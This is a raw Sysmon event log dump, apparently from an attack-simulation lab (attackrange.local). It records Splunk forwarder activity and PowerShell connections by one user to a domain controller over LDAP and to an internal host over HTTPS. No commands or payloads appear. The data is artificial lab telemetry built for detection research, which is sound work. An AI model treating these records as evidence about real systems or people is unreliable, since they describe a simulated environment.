Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A3676B915A9D4055B6249FCB4B2CB637,SHA256=4150A59D2D51330F63C8371DD6A4C818E358E6C7C8E59488899452E1DC5E8AD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:51.498{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86DF7C79B7E5FCE3D8EFC204340C1FED,SHA256=D143D2BC8B63D131B54AABF1222112D023DE0698CB4A770DFD9B6DAAA8F993ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.571{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62255-false10.0.1.14WIN-DC-128389ldap 23542300x800000000000000035129285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:52.626{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D283FD5EE97E979AB77E9707FEFB5FFC,SHA256=0CAEFD5F8333B23D24D5E92BB0B47936C8437437C3B52D1786B4E8493E17FE7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:52.504{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=697337B1B4FE2144DBF8CD5C70F2CB8B,SHA256=72751CC7516EB430B1DA1E2C850476E321C340DAC0480E086C3A9A3ADA8391EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:52.404{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=37396039C90C8A8ED20134B66F2468C0,SHA256=427336450E52A3BC06CE5795C757481B2592F7B190C6DDDF83BB1F2862947E64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000035129282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.571{B81B27B7-4822-613A-788F-03000000C801}6940_ldap._tcp.win-dc-128.attackrange.local.9003-C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000035129281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:16.571{B81B27B7-4822-613A-788F-03000000C801}6940_ldap._tcp.Default-First-Site-Name._sites.win-dc-128.attackrange.local.9003-C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035129287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:53.325{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=34EC383914C91088A6FE35F254B251AE,SHA256=5FD80909861EAC1020A175759D348630C8366D85AF085B256AF3B269C46D0072,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:54.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C583D73D82CBBBF985FDB10665B503B,SHA256=D10A8A9DBD46F6AEF935420F64907273F6526253FF6AC384AD8DF3F9F4AC054E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:18.398{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62256-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:56.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07C5D0945D969B8D91205E1B64A10DCB,SHA256=BB23598D0C335EE6F069042E55EFE20565EF1BB699EF21E92696D7B7FDB0EB8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:22.322{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62257-false10.0.1.12-8000- 10341000x800000000000000035129291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:57.069{B81B27B7-4012-611D-0D00-00000000C801}7925480C:\Windows\system32\svchost.exe{B81B27B7-429F-611D-0601-00000000C801}5536C:\Windows\system32\ServerManager.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035129293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:23.454{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62258-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:00.139{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:01.138{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F1D13F6C041D27C6627DEF7906CD0A8,SHA256=7ED004EA111B320C9F46587249A29B18689DC38ECACD07D7919BB87E4C4F04DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:02.268{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D161C790F4A92AAC57AE2443D5AADD4F,SHA256=12ACDB3793CAA039B1F7E5F92A04D6B04A46D51CF165DD78B5CF96173C67E8DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:02.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62C0F581A31B75B36E1A2498E4689D29,SHA256=6FACAD89DEA9F1F6461B06C936EBF0B0EE0840A0168AF7676DD806F84FBB69C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:26.302{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62259-false10.0.1.12-8089- 23542300x800000000000000035129299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:03.536{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9A5C38F4009F6D38916C02C6335F877,SHA256=238732C349C17AEFEE0C0BF983CC68A33C64586FBD8AC263B62E2C05243B9E58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:04.670{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71EB6F1AEAA3A783912571D74D382FB6,SHA256=CB97FE503D83693427EC3A7120CC4B7A105DA63D2D054CE717A75A77F56B0A55,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:28.469{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62261-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035129301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:28.254{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62260-false10.0.1.12-8000- 23542300x800000000000000035129300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:04.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C08C8687C40273847DC9F49D81503F84,SHA256=C8F5B50AD5927EF92673F165374469930C11A2153D27A950F3C7804BE096D663,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:05.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF964DB1828EC64C2D8BC3FD30B91F8,SHA256=BF11EA4CB6BC09ED0A4B991684301868DFC767745182EA5FA83EC3E156D33FBB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:06.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33417C366C810CC7268BB433EDB14E3,SHA256=AB0C3796EF91505F490C8C9E30FB438ED87F58A94B315D107454553B77DF4EFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:32.484{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62262-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:08.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F343F933B90794D780E5A0C66B9F13D1,SHA256=396598DC00EF07BEAA79B3CBC990B196F16E3B68C9A945F572E03BB76D4D2E66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:09.347{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12EE748C04B3CAAB2DB07941A2565412,SHA256=30428CFA68CB4F9FED04AD6D265719B9AB826579E239F2B20E3AA973965613A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:33.333{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62263-false10.0.1.12-8000- 10341000x800000000000000035129320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.708{B81B27B7-8462-613A-F896-03000000C801}29125644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.530{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8462-613A-F896-03000000C801}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.530{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.530{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.530{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.530{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.530{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8462-613A-F896-03000000C801}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.529{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8462-613A-F896-03000000C801}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.512{B81B27B7-8462-613A-F896-03000000C801}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EB728DEE53843267BF07EFC870B5E23B,SHA256=ECF212C5B5B79BCA7BC38A9273A00C0D443053D56FB9938A75E77B11EE0DA010,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:10.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BBFEBAF16425BA168DD494EAFB600F0,SHA256=57D59ED71F1F39FF9894021E846DCC2A2B4AAB2B88149E17C755AF96E3504C9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.660{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D275056C149E1FA0659F5647D6E5459,SHA256=CD88F52DA138D6FBEDFC4AD7CFF8D723974C4E59D29F1DD04ACF9EA216E61313,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.660{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70864912822456A741EE96DF0FE195FB,SHA256=F3AC71B1A14D4450629786FF34C36097ABE9AA35561D30D8E9F89A701BEE4980,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.660{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EFE5AD3843233195DABB55FC50D8F3D,SHA256=C4985988E2095691FFB97A1FAFFFE2A9DDB3BD7B2133CE7E42C89E123F6FE745,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:11.107{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8463-613A-F996-03000000C801}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 